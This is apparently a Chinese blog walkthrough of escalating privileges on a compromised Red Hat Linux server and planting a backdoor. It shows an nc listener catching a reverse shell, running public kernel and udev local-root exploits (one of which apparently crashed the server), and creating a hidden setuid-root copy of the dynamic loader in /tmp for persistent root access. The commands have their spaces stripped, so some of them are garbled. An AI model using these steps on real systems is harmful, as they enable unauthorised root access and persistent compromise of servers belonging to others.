一次linux提权及留后门

linux提权首先就是先反弹一个shell回本地，本地用nc进行监听，命令：nc-lvvp12665（即监听12665端口），不一会，就反弹回了一个shell。首先我们来看一下linux内核版本，命令uname-a，返回：





2.6.18-8的内核，再来看看什么系统，嘿嘿。命令：head-n1/etc/issue返回：RedHatEnterpriseLinuxServerrelease5(Tikanga)，呵呵，来找一个对应的exp，在天阳下载了一个2.6.18的本地溢出exp，使用shell上传至shell所在目录，因为这个exp是编译好的，所以不用gcc进行编译。查看服务器是否安装gcc，命令gcc-v若是支持则返回下图：

之后就可以用gcc来编译c文件，命令如：gcc-oexpexp.c（把exp.c编译成exp）。因为是编译好的，文章中就不截图了。上传只后赋予exp权限，chmod+x2.6.18，之后执行./2.6.18之后突然就没有反映了。。。。难道是本地溢出之后把服务器弄挂了？百思不得其解，访问网站也没法访问，这下郁闷了。。先放着吧。第二天早上起床又来看，发现网站可以访问了。这次可不敢用这个exp来进行溢出了。。。换了个udev提权，适用于内核范围为2.6.*。还是上传文件至服务器shell所在目录，执行命令ls，发现文件已经躺在那里面了，之后赋予exp执行权限。chmod+xpwnkernel.cchmod+xwunderbar_emporium.shchmod+xexploit.c之后执行溢出./w*成功溢出，root权限，：

 之后就是留下一个后门~依次输入命令cd/tmpsh-3.1#ls/lib/ld-linux*/lib/ld-linux.so.2sh-3.1#cp/lib/ld-linux.so.2/tmp/.str1vensh-3.1#ls-l.str1ven-rwxr-xr-x1rootroot12168407-0821:13.str1vensh-3.1#chmod+s.str1vensh-3.1#ls-l.str1ven-rwsr-sr-x1rootroot12168407-0821:13.str1ven成功建立一个后门，退出root，执行./.str1ven`whichwhoami`,又成功获取root权限~~  
提权至此结束。

*
*